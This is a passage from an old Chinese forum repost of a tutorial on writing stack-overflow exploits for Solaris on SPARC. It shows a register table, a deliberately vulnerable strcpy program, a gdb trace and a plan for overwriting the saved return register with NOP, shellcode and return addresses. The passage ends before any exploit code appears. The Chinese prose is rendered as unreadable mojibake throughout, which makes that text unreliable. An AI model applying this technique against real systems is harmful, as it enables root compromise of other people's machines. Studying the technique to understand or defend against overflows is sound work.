ÀóÔ°ÔÚÏß
ÀóÔ°Ö®ÃÀ£¬ÔÚ´ºÖ®ÃÈÑ¿£¬ÔÚÏÄÖ®ÕÀ·Å£¬ÔÚÇïÖ®ÊÕ»ñ£¬ÔÚ¶¬Ö®³Áµí
[»Øµ½¿ªÊ¼]
[ÉÏһƪ][ÏÂһƪ]
·¢ÐÅÈË: Lg (´´ÔìÈËÉúµÄ´«Ææ), ÐÅÇø: Linux
±ê Ìâ: Solaris for SPARC ¶ÑÕ»Òç³ö³ÌÐò±àд(1)
·¢ÐÅÕ¾: BBS ÀóÔ°³¿·çÕ¾ (Wed Jun 7 18:24:20 2000), Õ¾ÄÚÐżþ
¡¾ ÒÔÏÂÎÄ×ÖתÔØ×Ô Hacker ÌÖÂÛÇø ¡¿
¡¾ ÔÎÄÓÉ Sealed Ëù·¢±í ¡¿
Solaris for SPARC ¶ÑÕ»Òç³ö³ÌÐò±àд(1)
·¢²¼ÈÕÆÚ: 2000-5-18
ÄÚÈÝ:
--------------------------------------------------------------------------------
--- Õª×Ô<<ÂÌÃËÔ¿¯>>µÚ¾ÅÆÚ
Solaris for SPARC ¶ÑÕ»Òç³ö³ÌÐò±àд
×÷Õß: warning3 < warning3@hotmail.com >
Ö÷Ò³£ºhttp://www.isbase.com
ÈÕÆÚ: 2000/05/05
Ç°ÑÔ£º
ÖÚËùÖÜÖª£¬SolarisϵͳµÄ»º³åÇøÒç³ö©¶´¿ÉÒÔ˵ÊDzã³ö²»Ç¹¥»÷Õßͨ³£¿ÉÒÔºÜÇáÒ×µØ
ÀûÓÃÕâЩ©¶´»ñµÃϵͳµÄ¿ØÖÆȨ¡£µ«Ä¿Ç°ËƺõºÜÉÙ¿´µ½Óн²ÈçºÎÔÚSolarisϱàдÒç³ö³Ì
ÐòµÄÎÄÕ£¬Òò´ËÎÒ¾ö¶¨Ð´Ò»ÆªÕâ·½ÃæµÄÎÄÕ£¬Ö÷ÒªÊÇÅ×שÒýÓñ£¬Ï£ÍûÄÜÒýÆðһЩÌÖÂÛ£¬¹²
ͬÌá¸ß£¬ÎÒµÄÄ¿µÄÒ²¾Í´ïµ½ÁË¡£ÓÉÓÚÎÒ¶ÔSPARC½á¹¹Ò²ÊǸոտªÊ¼Ñ§Ï°£¬ºÜ¶àµØ·½¶¼ÊÇƾ
×Ô¼ºµÄÀí½â£¬´íÎóÊè©֮´¦ÔÚËùÄÑÃ⣬»¶ÓÅúÆÀÖ¸Õý¡£
×¢: sczÒѾдÁËһƪºÜºÃµÄÎÄÕ£¬¹ØÓÚ±àдSolaris (SPARC)ÏÂshellcodeµÄ¡£Ïêϸ½éÉÜ
ÁËshellcodeµÄ±àд¹ý³Ì£¬Í¬Ê±¶ÔSPARC½á¹¹Ò²Óзdz£Ï꾡½éÉÜ¡£Èç¹ûÏëÁ˽âshellcode±à
д£¬½¨ÒéÏÈ¿´Ò»Ï¸ÃÎÄ¡£
±¾ÎÄÖÐËùÓгÌÐò¶¼ÔÚ SunOS 5.7/5.6 Generic sun4u sparc SUNW,Ultra-5_10 ϲâÊÔͨ
¹ý
1. SPARCƽ̨µÄ»ù±¾ÖªÊ¶
1.1 ͨÓüĴæÆ÷
1.2 ¹ý³Ìµ÷ÓûúÖÆ
2. ÆÕͨÒç³ö³ÌÐò±àд
2.1 »ù±¾Ë¼Â·
2.2 ʵÏÖ·½·¨
2.3 Ò»¸öÕë¶Ôvul.cµÄ²âÊÔ³ÌÐòexp.c
2.4 Ò»¸öʵ¼Ê²âÊÔ³ÌÐòµÄ±àд¹ý³Ì(lpset -a)
3. Èƹý²»¿ÉÖ´ÐжÑÕ»±£»¤µÄÒç³ö³ÌÐò±àд
3.1 »ù±¾Ë¼Â·
3.2 Ò»¸öÕë¶Ôvul.cµÄ²âÊÔ³ÌÐòex_noexec.c
3.3 ²»Äܵõ½root shellµÄ·ÖÎöÒÔ¼°½â¾ö·½·¨
3.4 ¹ØÓÚ¼ÙÕ»Ö¡µØÖ·µÄÈ·¶¨
3.5 Ò»¸öʵ¼ÊµÄÀý×Ólpset_nonexec.c
3.6 ÀûÓÃstrcpy()¿½±´shellcode
3.7 Ò»¸öʵ¼ÊµÄÀý×Ólpset_nonexec1.c
4. ½áÊøÓï
5. ²Î¿¼ÎÄÏ×
ÄÚÈÝ£º
1. SPARCƽ̨µÄ»ù±¾ÖªÊ¶
SPARCƽ̨ºÍIntel x86Óкܶ಻ͬµÄµØ·½£¬ÎªÁËÀí½âSPARCϵÄÒç³ö£¬ÎÒÃÇÏÈÀ´Á˽âÒ»ÏÂ
SPARCϵļĴæÆ÷ÒÔ¼°¹ý³ÌÖ´ÐеÄÇé¿ö¡£ÏÞÓÚƪ·ù£¬ÕâÀï²»¿ÉÄÜ×÷·Ç³£Ï꾡µÄ½éÉÜ£¬ÓÐÐË
ȤµÄÅóÓÑ¿ÉÒÔÈ¥²é¿´Ïà¹ØµÄ×ÊÁÏ¡£
1.1 ͨÓüĴæÆ÷
SPARC°üº¬4×éͨÓüĴæÆ÷£¬Ã¿×é°üº¬8¸ö¼Ä´æÆ÷¡£ÆäÖÐÒ»×éÊÇÈ«¾Ö(global)¼Ä´æÆ÷,ÁíÍâ
Èý
×é¼Ä´æÆ÷ÊÇout,local,in.ÿ×é¼Ä´æÆ÷µÄ»ù±¾¹¹³É¼°×÷ÓÃÈçϱíËùʾ:
%g0 (r00) ʼÖÕΪ0
%g1 (r01) [1] ÁÙʱֵ
%g2 (r02) [2]
global %g3 (r03) [2]
%g4 (r04) [2]
%g5 (r05) ±£Áô
%g6 (r06) ±£Áô
%g7 (r07) ±£Áô
%o0 (r08) [3] Êä³ö²ÎÊý0/±»µ÷º¯Êýµ÷Ó÷µ»ØÖµ
%o1 (r09) [1] Êä³ö²ÎÊý1
%o2 (r10) [1] Êä³ö²ÎÊý2
out %o3 (r11) [1] Êä³ö²ÎÊý3
%o4 (r12) [1] Êä³ö²ÎÊý4
%o5 (r13) [1] Êä³ö²ÎÊý5
%sp, %o6 (r14) [1] ¶ÑÕ»Ö¸Õë
%o7 (r15) [1] ÁÙʱÊý¾Ý/CALLÖ¸ÁîµÄµØÖ·
%l0 (r16) [3] local 0
%l1 (r17) [3] local 1
%l2 (r18) [3] local 2
local %l3 (r19) [3] local 3
%l4 (r20) [3] local 4
%l5 (r21) [3] local 5
%l6 (r22) [3] local 6
%l7 (r23) [3] local 7
%i0 (r24) [3] ÊäÈë²ÎÊý0/·µ»Ø¸øÖ÷µ÷º¯ÊýµÄÖµ
%i1 (r25) [3] ÊäÈë²ÎÊý1
%i2 (r26) [3] ÊäÈë²ÎÊý2
in %i3 (r27) [3] ÊäÈë²ÎÊý3
%i4 (r28) [3] ÊäÈë²ÎÊý4
%i5 (r29) [3] ÊäÈë²ÎÊý5
%fp, %i6 (r30) [3] Õ»Ö¡Ö¸Õë
%i7 (r31) [3] ( ·µ»ØµØÖ· - 8 )
ÆäÖÐout,local,inÈý×é¼Ä´æÆ÷£¨24¸ö¼Ä´æÆ÷£©×é³ÉÒ»¸ö"¼Ä´æÆ÷´°"¡£ÔÚSPARCÖпÉÒÔ°üº¬
¶à¸ö¼Ä´æÆ÷´°¡£Ã¿¸ö¹ý³ÌÔÚÖ´ÐÐÖж¼¶ÔÓ¦Ò»¸ö¼Ä´æÆ÷´°£¬³ÆΪµ±Ç°¼Ä´æÆ÷´°¡£Ò»¸öÌØÊâ
¼Ä´æÆ÷CWP£¨current window pointer)¼Ç¼µ±Ç°µÄ¼Ä´æÆ÷´°ºÅÂ롣ÿ¸ö¼Ä´æÆ÷´°µÄout,
in
¼Ä´æÆ÷·Ö±ðµÈÓÚÏàÁڼĴæÆ÷´°µÄin,out¼Ä´æÆ÷¡£ÈçÏÂͼËùʾ¡£
outs[1] locals[1] ins[1] 1ºÅ¼Ä´æÆ÷´°
outs[2] locals[2] ins[2] 2ºÅ¼Ä´æÆ÷´°
outs[3] locals[3] ins[3] 3ºÅ¼Ä´æÆ÷´°
outs[4] ...
1.2 ¹ý³Ìµ÷ÓûúÖÆ
ÏÈÀ´¿´Ò»¸ö¼òµ¥µÄÎÊÌ⺯Êý£¬ËüÊÇ´æÔÚ»º³åÇøÒç³öÎÊÌâµÄ£º
--------------------------------------------------------------------------
/*
* vul.c
* written by warning3 <warning3@hotmail.com>
* gcc -o vul vul.c
*/
func ( char * str )
{
char buf[8];
strcpy( buf, str );
printf( "%s\n", buf );
}
int main ( int argc, char * argv[] )
{
if ( argc > 1 )
{
func( argv[1] );
}
} /* end of main */
--------------------------------------------------------------------------
ÎÒÃÇÀ´·ÖÎöÒ»ÏÂËüµÄÖ´Ðйý³Ì£º
[warning3@sun1 ovw]$ gcc -o h vul.c
[warning3@sun1 ovw]$ gdb h
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) disass main
Dump of assembler code for function main:
0x10ad8 <main>: save %sp, -112, %sp ! ·ÖÅä¶ÑÕ»¿Õ¼ä£¬±£´æ¼Ä´æÆ÷l*,i*
0x10adc <main+4>: st %i0, [ %fp + 0x44 ] ! ½«²ÎÊýÒ»:argc ´æ´¢µ½[%fp +
0x44]
0x10ae0 <main+8>: st %i1, [ %fp + 0x48 ] ! ½«²ÎÊý¶þ:argv ´æ´¢µ½[%fp +
0x48]
0x10ae4 <main+12>: ld [ %fp + 0x44 ], %o0 ! ½«argc×°Èë%o0
0x10ae8 <main+16>: cmp %o0, 1 ! ±È½ÏÊÇ·ñµÈÓÚ1
0x10aec <main+20>: ble 0x10b0c <main+52> ! Èç¹û<=1,·µ»Ø
0x10af0 <main+24>: nop ! ÑÓ³ÙÖ¸Áî
0x10af4 <main+28>: mov 4, %o0 ! Áî%o0=0x4
0x10af8 <main+32>: ld [ %fp + 0x48 ], %o2 ! ½«argvÖ¸ÕëµØÖ··ÅÈë%o2
0x10afc <main+36>: add %o0, %o2, %o1 ! %o2 + 4 = argv[1]
0x10b00 <main+40>: ld [ %o1 ], %o0 ! ½«argv[1]µÄµØÖ·¸¶¸ø%o0
0x10b04 <main+44>: call 0x10aa0 <func> ! µ÷ÓÃ×Óº¯Êý<func>
0x10b08 <main+48>: nop ! ÑÓ³ÙÖ¸Áî
0x10b0c <main+52>: ret ! ·µ»Ø
0x10b10 <main+56>: restore ! »Ö¸´¶ÑÕ»
End of assembler dump.
(gdb) b *0x10ad8
Breakpoint 1 at 0x10ad8
(gdb) r aaaaaaaa
Starting program: /space/staff/warning3/ovw/h aaaaaaaa
Breakpoint 1, 0x10ad8 in main ()
(gdb) i r i0 i1 i2 i3 i4 i5 fp i7
i0 0x0 0
i1 0x0 0
i2 0x0 0
i3 0x0 0
i4 0x0 0
i5 0x0 0
fp 0x0 0
i7 0x0 0
(gdb) i r o0 o1 o2 o3 o4 o5 sp o7
o0 0x2 2 <----- µÚÒ»¸ö²ÎÊý: argc = 2
o1 0xffbefc4c -4260788 <----- µÚ¶þ¸ö²ÎÊý: argvÖ¸Õë
o2 0xffbefc58 -4260776 <----- »·¾³±äÁ¿Ö¸Õë
o3 0x21998 137624 <----- Ö¸Ïò»·¾³±äÁ¿Ö¸ÕëµÄÖ¸Õë
**environ
o4 0x0 0
o5 0x0 0
sp 0xffbefbe8 -4260888 <----- µ±Ç°¶ÑÕ»Ö¸Õë
o7 0x109bc 68028 <----- µ÷ÓÃmainº¯ÊýµÄµØÖ·:call
0x10ad8 <main>
(gdb) x/x $o1
0xffbefc4c: 0xffbefd40
(gdb) x/s 0xffbefd40
0xffbefd40: "/space/staff/warning3/ovw/h" <---- argv[0]
(gdb) x/x $o1 + 4
0xffbefc50: 0xffbefd5c
(gdb) x/s 0xffbefd5c
0xffbefd5c: "aaaaaaaa" <---- argv[1]
(gdb) x/x $o2
0xffbefc58: 0xffbefd65 <---- »·¾³±äÁ¿µÄÆðʼµØÖ·
(gdb) x/5s 0xffbefd65
0xffbefd65: "PWD=/space/staff/warning3/ovw"
0xffbefd83: "TZ=PRC"
0xffbefd8a: "_INIT_RUN_NPREV=0"
0xffbefd9c: "HZ=100"
0xffbefda3: "HOSTNAME=sun1.isbase.com"
(gdb) x/x $o3
0x21998 <environ>: 0xffbefc58 <---- Ö¸Ïò%o2Ëù´æµÄµØÖ·
(gdb) si <---- Ö´ÐÐ:save %sp, -112, %sp
0x10adc in main () Ϊmain()ÉèÖöÑÕ»¿Õ¼ä
(gdb) i r i0 i1 i2 i3 i4 i5 fp i7 <---- ½«¼Ä´æÆ÷×éoutÈ«²¿»»Îªin
i0 0x2 2
i1 0xffbefc4c -4260788
i2 0xffbefc58 -4260776
i3 0x21998 137624
i4 0x0 0
i5 0x0 0
fp 0xffbefbe8 -4260888 <---- ÔÀ´µÄ%sp±ä³É%fp
i7 0x109bc 68028
(gdb) i r o0 o1 o2 o3 o4 o5 sp o7 <---- ´´½¨ÐµļĴæÆ÷×éout
o0 0x0 0
o1 0x0 0
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbefb78 -4261000 <---- еÄsp(o6)= ÔÀ´µÄsp - 112(0x70)
o7 0x0 0
ÕâʱºòsaveÖ¸ÁîÒѾ¼ÆËãÁ˺¯Êý¶ÑÕ»Ö¡µÄ³¤¶ÈΪ112×Ö½Ú£¬Òò´Ë£¬½«µ±Ç°¶ÑÕ»Ö¸ÕëÇ°ÒÆ
112
×Ö½Ú,Ϊ±£Áô¼Ä´æÆ÷ÒÔ¼°·ÖÅä±äÁ¿Áô³ö¿Õ¼ä£¬Ö¸Ïò¶ÑÕ»¿ªÍ·
(gdb) x/8xw $sp <---- ½«l0 - l7´æÈë$spµÍ¶Ë
0xffbefb78: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbefb88: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/8xw $sp + 32 <---- ½«i0 - i7´æÈë$sp+32´¦
0xffbefb98: 0x00000002 0xffbefc4c 0xffbefc58 0x00021998
0xffbefba8: 0x00000000 0x00000000 0xffbefbe8 0x000109bc
----¡¢----
¡¢_£¨·µ»ØµØ
Ö·-8£©
ÖµµÃ×¢ÒâµÄÊÇ£¬l0-l7,i0-i7¼Ä´æÆ÷µÄÖµ±£´æµ½ÁËmain()¶ÑÕ»µÄ¿ªÍ·´¦£¬ÆäÖÐi7±£´æµÄÖµ
ÊÇ call <main> Ö¸ÁîµÄµØÖ·£¬Ò²¾ÍÊÇ£¨·µ»ØµØÖ·-8£©¡£
(gdb) x/2x $fp + 0x44
0xffbefc2c: 0x00000000 0x00000000
(gdb) si <---- st %i0, [ %fp + 0x44 ]
0x10ae0 in main ()
(gdb) x/2x $fp + 0x44 °Ñ²ÎÊý1(argc)´æ´¢µ½[ %fp + 0x44
]
0xffbefc2c: 0x00000002 0x00000000
(gdb) si <---- st %i1, [ %fp + 0x48 ]
0x10ae4 in main ()
(gdb) x/2x $fp + 0x44 °Ñ²ÎÊý2(**argv)µØÖ·´æµ½[ %fp +
0x48 ]
0xffbefc2c: 0x00000002 0xffbefc4c
ÎÒÃÇ¿ÉÒÔ¿´µ½Ò»¸öÓÐȤµÄÏÖÏó£¬main()º¯Êý½«ËüµÄ²ÎÊý·Åµ½ÁË%fp + 0x44¿ªÊ¼µÄµØÖ·¡£
0x44=68=(8 + 8 + 1)*4 , %fpÆäʵÊǵ÷ÓÃmainº¯Êý֮ǰµÄ¶ÑÕ»Ö¸Õ룬Ҳ¾ÍÊÇ<_start>
º¯ÊýµÄ¶ÑÕ»Ö¸Õ룬%fp´¦´æ´¢µÄÊÇl0-l7,%fp + 32´¦´æ´¢µÄÊÇi0-i7, %fp + 64´¦(4¸ö×Ö
½Ú)ÊÇÓÃÀ´´æ·Åmain()º¯ÊýµÄ·µ»ØÖµµÄ¡£¶ø %fp + 68 ¿ªÊ¼ÓÃÀ´´æ·Å main()º¯ÊýµÄ²ÎÊý
¡£Ò²¾ÍÊÇ˵£ºÔÚsolarisµ×Ï£¬±»µ÷º¯ÊýµÄ²ÎÊýÊÇ·ÅÔÚÖ÷µ÷º¯ÊýµÄ¶ÑÕ»Õ»Ö¡Öеġ£
(gdb) b *0x10b00 <---- ÖмäµÄ¾Í²»¿´ÁË£¬Ã»Ê²Ã´Ìرð
Breakpoint 2 at 0x10b00
(gdb) c
Continuing.
Breakpoint 2, 0x10b00 in main ()
(gdb) i r o0
o0 0x4 4
(gdb) si <---- ½«"aaaaaaa"µÄµØÖ·´«¸ø%o0
0x10b04 in main () <---- ÏÂÒ»ÌõÖ¸ÁîµØÖ·ÊÇ0x10b04
(gdb) x/s $o0
0xffbefd5c: "aaaaaaaa"
(gdb) i r o7
o7 0x0 0 <---- o7ÏÖÔÚÊÇ0
(gdb) si <---- Ö´ÐÐcall <func>µ÷ÓÃ
0x10b08 in main ()
(gdb) i r o7
o7 0x10b04 68356 <---- ÏÖÔÚo7±ä³ÉÁË0x10b04£ºcall
<func>µÄµØÖ·
(gdb) i r o0 o1 o2 o3 o4 o5 sp o7
o0 0xffbefd5c -4260516
o1 0xffbefc50 -4260784
o2 0xffbefc4c -4260788
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbefb78 -4261000
o7 0x10b04 68356
(gdb) i r i0 i1 i2 i3 i4 i5 fp i7
i0 0x2 2
i1 0xffbefc4c -4260788
i2 0xffbefc58 -4260776
i3 0x21998 137624
i4 0x0 0
i5 0x0 0
fp 0xffbefbe8 -4260888
i7 0x109bc 68028
(gdb) i r pc
pc 0x10b08 68360
(gdb) si <---- Ö´ÐÐÑÓʱָÁî
0x10aa0 in func ()
(gdb) i r pc <---- ½«%pcÉèÖõ½<func>¿ªÊ¼
pc 0x10aa0 68256
(gdb) si <---- Ö´ÐÐsave %sp, -120, %spÖ¸Áî
0x10aa4 in func ()
(gdb) i r o0 o1 o2 o3 o4 o5 sp o7 <---- ´´½¨ÐµļĴæÆ÷×éout
o0 0x0 0
o1 0x0 0
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbefb00 -4261120 <---- ½«spÖ¸Ïò sp - 120
o7 0x0 0
(gdb) i r i0 i1 i2 i3 i4 i5 fp i7 <---- ½«out»»³Éin
i0 0xffbefd5c -4260516
i1 0xffbefc50 -4260784
i2 0xffbefc4c -4260788
i3 0x0 0
i4 0x0 0
i5 0x0 0
fp 0xffbefb78 -4261000 <---- main()µÄ¶ÑÕ»Ö¸Õë±ä³ÉÁË%fp
i7 0x10b04 68356 <---- func()µÄ·µ»ØµØÖ·-8
(gdb) disass func
Dump of assembler code for function func:
0x10aa0 <func>: save %sp, -120, %sp
0x10aa4 <func+4>: st %i0, [ %fp + 0x44 ]
0x10aa8 <func+8>: add %fp, -24, %o1
0x10aac <func+12>: mov %o1, %o0
0x10ab0 <func+16>: ld [ %fp + 0x44 ], %o1
0x10ab4 <func+20>: call 0x216f0 <strcpy>
0x10ab8 <func+24>: nop
0x10abc <func+28>: add %fp, -24, %o1
0x10ac0 <func+32>: sethi %hi(0x11400), %o2
0x10ac4 <func+36>: or %o2, 0x268, %o0 ! 0x11668 <_lib_version+8>
0x10ac8 <func+40>: call 0x216fc <printf>
0x10acc <func+44>: nop
0x10ad0 <func+48>: ret
0x10ad4 <func+52>: restore
End of assembler dump.
´ÓÕâÀïÎÒÃÇÓ¦¸Ã¿ÉÒÔ¿´µ½SPARCº¯Êýµ÷ÓõĻù±¾Á÷³ÌÁË
Ö÷µ÷º¯Êý ±»µ÷º¯Êý
------ ------
main
*
*
call func
nop -------\
|
\---> func: save %sp, -framesize, %sp
*
*
*
*
ret
restore
|
* <------------------/
*
*
*
¼òµ¥½éÉÜÒ»ÏÂËĸö³£ÓÃÖ¸ÁîµÄ¹¦ÄÜ£º
<1> callÖ¸Áµ±Ç°callÖ¸ÁîµÄµØÖ·±£´æµ½¼Ä´æÆ÷%o7ÖÐ,È»ºó½«¿ØÖÆתÏòfunc()¡£
callºóÃæµÄnopÖ¸ÁîÊÇÒ»¸öÑÓ³Ù²Ù×÷¡£µ±´Ófunc()Öзµ»Ø(ret)µÄʱºò£¬Ó¦¸ÃÌøµ½nop
ºóÃæµÄµØÖ·(%o7+8)È¥Ö´ÐÐ,Òò´Ë£¬%o7Öб£´æµÄÖµÊÇ·µ»ØµØÖ·-8.
<2> saveÖ¸ÁîÍê³ÉÈçϲÙ×÷£º
1. ¼ÆËã±¾µ÷Óùý³ÌµÄÕ»Ö¡´óС£¬¸ù¾ÝÖ÷µ÷º¯ÊýµÄ%sp(%o6)¼ÆË㵱ǰ¶ÑÕ»Ö¸ÕëµÄеØ
Ö·
2. ½«¼Ä´æÆ÷´°ºÅ¼õÒ»
3. ÔÙ½«¾ÉµÄ¼Ä´æÆ÷"out"¸ÄÃûΪ"in". ÕâÑù£¬Ö÷µ÷º¯ÊýmainµÄ¶ÑÕ»Ö¸Õë(%sp/%o6)¾Í
±£´æµ½(%fp/%i6)ÖÐ,func()µÄ·µ»ØµØÖ·Ò²±£´æµ½ÁË%i7ÖÐ
4. È»ºóSave»á´´½¨ÐµÄ"out"ºÍ"local"¼Ä´æÆ÷×飬Ȼºó½«µ±Ç°¶ÑÕ»µÄµØÖ·(%sp)±£
´æµ½%o6(×¢Ò⣺ÕâÀïÊDZ»µ÷º¯ÊýµÄ%o6)ÖС£
5. ½«%l0-%l7±£´æµ½(%sp)´¦£¬½«%i0-%i7±£´æµ½(%sp+32)´¦,
<3> retÖ¸ÁîÊǸöºÏ³ÉÖ¸ÁµÈ¼ÛÓÚjmpl %i7+8, %g0.Ëü½«Ìøתµ½%i7+8´¦.ÓÉÓÚ%i7Öб£
´æ
µÄÖµÊÇcallÖ¸ÁîµÄµØÖ·,ËùÒÔ³ÌÐò¾ÍÌøµ½ÕýÈ·µÄµØÖ·(Ìø¹ýcallºóÃæµÄÑÓ³ÙÖ¸ÁîNOP)
È¥
Ö´ÐÐÁË¡£
<4> restoreÒ²ÊǸöºÏ³ÉÖ¸ÁËü½«¼Ä´æÆ÷´°ºÅÔö¼ÓÒ»£¬È»ºó½«"in"¼Ä´æÆ÷×é¸ÄÃûΪ
"out"
,²¢½«Ö÷µ÷º¯Êý±£´æÔÚ¶ÑÕ»ÖеÄ%i0-%i7(%fp+32¿ªÊ¼)ºÍ%l0-%l7(%fp¿ªÊ¼)»Ö¸´µ½ÐÂ
µÄ
"in"ºÍ"local"¼Ä´æÆ÷×éÖÐ,ÕâÑùmain()µÄÈý×é¼Ä´æÆ÷¾Í»Ö¸´³ÉÔ×´ÁË¡£
ÎÒÃÇÔÙÀ´¿´Ò»ÏÂÖ´Ðйý³Ìµ÷ÓÃʱ¶ÑÕ»ÖеÄÄÚ´æ·ÖÅäÇé¿ö:
±»µ÷Óùý³ÌµÄ¶ÑÕ»£¨ÔÚÖ´ÐÐÁËsaveÖ¸ÁîÒÔºó)
================================================
¶ÑÕ»µÍÖ·
___________ ___________ %sp ( func() )
%sp | %l0-%l7 | 8*4 ±£´æfunc()µÄ%l0-%l7¼Ä´æÆ÷
|__________|
%sp+32 | %i0-%i7 | 8*4 ±£´æfunc()µÄ%i0-%i7¼Ä´æÆ÷ (%i7°üº¬func()µÄ·µ»ØµØÖ·)
|__________|
%sp+64 |·µ»ØÖµµØÖ·| 1*4 ΪÏÂÒ»¸ö±»µ÷º¯Êý±£ÁôµÄ·µ»ØÖµµØÖ·¿Õ¼ä
|__________|
%sp+68 | ²ÎÊýµØÖ· | 6*4 ΪÏÂÒ»¸ö±»µ÷º¯Êý±£Áô(Ç°6¸ö)²ÎÊýµÄ¿Õ¼ä
|__________|
%sp+92 | ²ÎÊýµØÖ· | n*4 n>=1 Èç¹ûÏÂÒ»¸ö±»µ÷º¯ÊýµÄ²ÎÊý>6£¬¶à³öµÄ²ÎÊýÔÚÕâÀï·ÖÅä
|__________|
|¾Ö²¿±äÁ¿ |
| .... | n*8 Ϊfunc()µÄ¾Ö²¿±äÁ¿·ÖÅä¿Õ¼ä,ÿ8¸ö×Ö½ÚΪһ¸ö·ÖÅäµ¥Ôª
| |
|__________|
| ÁÙʱÇøÓò | 4*4 C±àÒëÆ÷ÓÃÀ´¼ÆËã±í´ïʽʱ´¢´æһЩÁÙʱ±äÁ¿µÄÇøÓò
|__________|___________ %fp ( main() )
%fp | %l0-%l7 | 8*4 ±£´æmain()µÄ%l0-%l7¼Ä´æÆ÷
|__________|
%fp+32 | %i0-%i7 | 8*4 ±£´æmain()µÄ%i0-%i7¼Ä´æÆ÷(%i7°üº¬main()µÄ·µ»ØµØÖ·)
|__________|
%fp+64 |·µ»ØÖµµØÖ·| 1*4 ΪÏÂÒ»¸ö±»µ÷º¯Êý(ÕâÀïÊÇfunc())±£ÁôµÄ·µ»ØÖµµØÖ·¿Õ¼ä
|__________|
%fp+68 | ²ÎÊýµØÖ· | 6*4 ΪÏÂÒ»¸ö±»µ÷º¯Êý(ÕâÀïÊÇfunc())±£ÁôÇ°6¸ö²ÎÊýµÄµØÖ·¿Õ¼ä
|__________|
%fp+92 | ²ÎÊýµØÖ· | n*4 n>=1 Èç¹ûÏÂÒ»¸ö±»µ÷º¯ÊýµÄ²ÎÊý>6£¬¶à³öµÄ²ÎÊýÔÚÕâÀï·ÖÅä
|__________|
|¾Ö²¿±äÁ¿ |
| .... | n*8 Ϊmain()µÄ¾Ö²¿±äÁ¿·ÖÅä¿Õ¼ä,ÿ8¸ö×Ö½ÚΪһ¸öµ¥Ôª
| |
|__________|
| ±£ÁôÇøÓò | 4*4 4¸ö×ֵı£ÁôÇøÓò
|__________|
| %l0-%l7 |
|__________|
....
¶ÑÕ»¸ßÖ·
2. ÆÕͨÒç³ö³ÌÐò±àд
2.1 »ù±¾Ë¼Â·
´ÓÇ°ÃæËù½²µÄº¯Êýµ÷ÓõĹý³Ì¿ÉÒÔÖªµÀ£¬ÎÒÃÇÊDz»¿ÉÄܸ²¸Çµ±Ç°º¯ÊýµÄ·µ»ØµØÖ·µÄ£¬Òò
Ϊµ±Ç°º¯ÊýµÄ·µ»ØµØÖ·ÊDZ£´æÔڼĴæÆ÷%i7Öеģ¬È»¶ø£¬ÎÒÃÇ¿ÉÒÔ¸²¸Çµ±Ç°º¯ÊýµÄÖ÷µ÷
º¯ÊýµÄÕ»Ö¡£¬¼´%fpÍùºóµÄÇøÓò£¬ÕâÀï±£´æÓÐÖ÷µ÷º¯ÊýµÄ%l0-%l7ºÍ%i0-%i7.
ÒÔÉÏÃæµÄ³ÌÐòΪÀý£¬Ö»ÒªÊäÈë(n*8 + 4*4 + 8*4 + 8*4)¸ö×Ö½Ú³¤µÄÊý¾Ý£¬¾Í¿ÉÒÔÍêÈ«
¸²¸Çmain()º¯Êý±£´æµÄ%l0-%l7ºÍ%i0-%i7,ÕâÑù£¬µ±func()Ö´ÐÐÍêrestoreÖ¸Áîºó£¬¾Í»á
½«ÎÒÃÇÐ޸ĹýµÄ¶ÑÕ»ÄÚÈݻָ´µ½inºÍlocal¼Ä´æÆ÷ÖС£¶øµ±main()º¯ÊýÖ´ÐÐretÖ¸Áî·µ»Ø
ʱ£¬¾ÍÌøµ½(%i7+8)µÄµØÖ·È¥ÔËÐÐÁË£¬Ö»ÒªÔÚÕâ¸öµØÖ·ÊÂÏÈ·ÅÈëÎÒÃǵÄshellcode¾ÍÐÐÁË
¡£
Òò´Ë£¬ÔÚSPARCƽ̨ÏÂÃ棬ÎÒÃÇÖÁÉÙÐèÒªÁ½´Î·µ»Ø²ÅÄÜÍê³É¹¥»÷¡£ÕâºÍi386ÏÂÊDz»Ò»Ñù
µÄ¡£ÕâÒ²Òâζ×Å£¬Èç¹ûÔÚmain()º¯ÊýÖдæÔÚÒç³ö©¶´£¬ÄãÊDz»¿ÉÄܹ¥»÷³É¹¦µÄ¡£ÒòΪÔÚ
´Ómain()·µ»Øºó£¬Í¨³£<_start>»áµ÷ÓÃ<exit>»òÕß<_exit>Í˳ö£¬Òò´ËÄã²»¿ÉÄÜÔÙÐÞ¸Ä
¼Ä´æÆ÷%i7µÄÖµ²¢Ìøµ½ÄÇÀïÖ´ÐС£ÀýÈ磬ÏóÕâÑùµÄ³ÌÐòÊDz»¿ÉÄܽøÐÐÒç³ö¹¥»÷µÄ£¬ÓÐÐË
ȤµÄÈË¿ÉÒÔÊÔÒ»ÊÔ¡£
/* vul1.c */
int main(int argc, char **argv)
{
char buf[8];
strcpy(buf,argv[1]);
}
/* end of vul1.c */
2.2 ʵÏÖ·½·¨
Àí½âÁËÉÏÃæµÄº¯Êýµ÷ÓõĹý³ÌÖ®ºó£¬ÄÇôд¹¥»÷³ÌÐòÆäʵ¾ÍºÍLinuxºÜÏàËÆÁË¡£Ö»ÒªÓ÷µ
»ØµØÖ·¸²¸Ç±£´æµÄ%i7¾Í¿ÉÒÔÁË£¬Ê¾ÒâͼÈçÏ£º
µØÖ· -----------------------------> ¸ßÖ·
%fp %fp+32
-------------------------------------------
| buffer | ±£ÁôÇøÓò | %l0-%l7 | %i0 - %i7 |
--------------------------------------------
| NOPNOP...SHELLCODE| RET ... RET |
--------------------------------------------
^
| |
\------------------------/
¹ØÓÚSPARCƽ̨ÏÂshellcodeµÄ±àд£¬¿ÉÒԲο´sczµÄ<<solaris for sparcÏÂshellcodeµÄ
±àд>>£¬ÕâÀï²»ÔÙ׸Êö¡£
Èç¹ûbuffer±È½ÏС£¬·Å²»ÏÂÎÒÃǵÄshellcode£¬ÓÐÁ½ÖÖ·½·¨¿ÉÒÔ½â¾ö:
Ò»Êǽ«"NOP...NOP..SHELLCODE"²¿·ÖÒƵ½"RET..."ºóÃ棬
